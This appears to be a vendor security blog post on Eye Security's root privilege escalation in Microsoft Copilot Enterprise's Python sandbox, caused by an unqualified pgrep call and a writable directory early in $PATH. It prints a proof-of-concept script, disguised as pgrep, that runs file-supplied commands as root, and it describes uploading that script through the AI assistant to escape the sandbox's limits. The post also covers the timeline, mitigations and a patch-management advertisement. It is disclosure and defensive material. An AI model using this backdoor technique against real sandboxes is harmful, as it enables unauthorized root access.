You are currently viewing Privileged Path Hijack: Eye Security Exposes Root-Level Vulnerability in Copilot Enterprise

Privileged Path Hijack: Eye Security Exposes Root-Level Vulnerability in Copilot Enterprise

  • Post author:
  • Reading time:4 mins read

Summary
On April 18, 2025, Eye Security researchers identified a critical privilege escalation issue in Microsoft Copilot Enterprise’s live Python sandbox (Jupyter Notebook–based). A misconfigured entrypoint script (keepAliveJupyterSvc.sh) ran pgrep without using a full path. Because the $PATH Prioritized a writable directory (/app/miniconda/bin) over /usr/binAn attacker could upload a malicious pgrep script and gain root access inside the container. Microsoft patched the issue on July 25, 2025. No customer data was accessed, and Microsoft classified the flaw as moderate severity and did not issue a bug bounty, although Eye Security was publicly acknowledged.

Technical Breakdown

Vulnerability Details

  • April 2025 rollout introduced a Jupyter Notebook sandbox running as “ubuntu” in a Miniconda container.
  • The root-privileged script keepAliveJupyterSvc.sh executed pgrep without specifying /usr/bin/pgrep in a loop every two seconds.
  • Because /app/miniconda/bin (writable by attackers) preceded /usr/bin in $PATH, a malicious pgrep could hijack execution and escalate privileges.

Proof-of-Concept (PoC)

Eye Security researchers successfully exploited this vulnerability by crafting a malicious Python script and disguising it as pgrep. By uploading this script via Copilot, they could execute arbitrary commands with root privileges inside the container.

Malicious pgrep Script

import os
import subprocess
in_file = "/mnt/data/in"
out_file = "/mnt/data/out"
while True:
    if os.path.exists(in_file):
        with open(in_file, "r") as f:
            command = f.read().strip()
        os.remove(in_file)
        if command:
            process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            output, error = process.communicate()
            with open(out_file, "w") as f:
                f.write(output.decode())
            if error:
                with open(out_file, "a") as f:
                    f.write("nError:n" + error.decode())

The malicious script reads commands from /mnt/data/in, executes them using popen, and writes the output to /mnt/data/out. This technique effectively grants the attacker root access to the container environment.

Impact & MITRE ATT&CK Mapping

  • TA0004 Privilege Escalation: Gained root through path hijack.
  • TA0002 Execution: Attacker-controlled script executed as root.
  • T1068 Exploitation for Privilege Escalation: Misconfigured script enabled elevation.
  • T1204 User Execution: Execution occurred via uploaded malicious script.

Post-Exploit Findings

The container’s filesystem was isolated and lacked sensitive host data. No container escape was demonstrated. Eye Security noted potential exposure to Microsoft’s Responsible AI Operations panel and up to 21 internal services via Entra OAuth misuse, though no sensitive data was extracted.

Timeline & Response

DateEvent
April 18, 2025Vulnerability reported to Microsoft Security Response Center (MSRC)
July 25, 2025Patch released by Microsoft; vulnerability classified as moderate; no bug bounty issued
July 28, 2025Public reporting by Eye Security and independent cybersecurity outlets

Microsoft acknowledged Eye Security in its researcher portal but awarded no monetary bounty despite demonstrating a root-level access exploit.

Mitigation & Security Best Practices

  • Always use absolute paths in scripts (e.g. /usr/bin/pgrep).
  • Don’t place writable directories early in the $PATH.
  • Drop root privileges early, ensuring services run with minimal necessary rights.
  • Validate and sandbox user-uploaded scripts thoroughly.
  • Implement robust sandbox logging and limit execution environment visibility.
  • Adopt security-by-design principles and audit container configurations regularly.

Key Lessons for AI-Driven Sandbox Security

This incident demonstrates that simple misconfigurations, like missing binary paths and writable directories, can undermine strong AI sandbox defensibility. As enterprises integrate AI at scale, combining innovation with strict security hygiene is essential. Fighting complexity without inviting chaos in containerized environments is imperative.

Excerpt for Publication

Researchers from Eye Security reported the vulnerability to Microsoft on April 18, 2025, and a fix was issued by July 25, 2025. The attack exploited a malicious script in a writable directory and missing binary path enforcement to achieve root access inside the container—but crucially, no customer data was accessed nor host systems breached. Microsoft rated the flaw as moderate severity, issued no bug bounty, and credited Eye Security. Further research hinted at access to up to 21 internal services using Entra OAuth—highlighting how limited sandbox flaws can expose broader surfaces.

Instantly Fix Risks with Saner Patch Management

Saner patch management is a continuous, automated, and integrated software that instantly fixes risks exploited in the wild. The software supports major operating systems like Windows, Linux, and macOS, as well as 550+ third-party applications.

It also allows you to set up a safe testing area to test patches before deploying them in a primary production environment. Saner patch management additionally supports a patch rollback feature in case of patch failure or a system malfunction.

Experience the fastest and most accurate patching software here.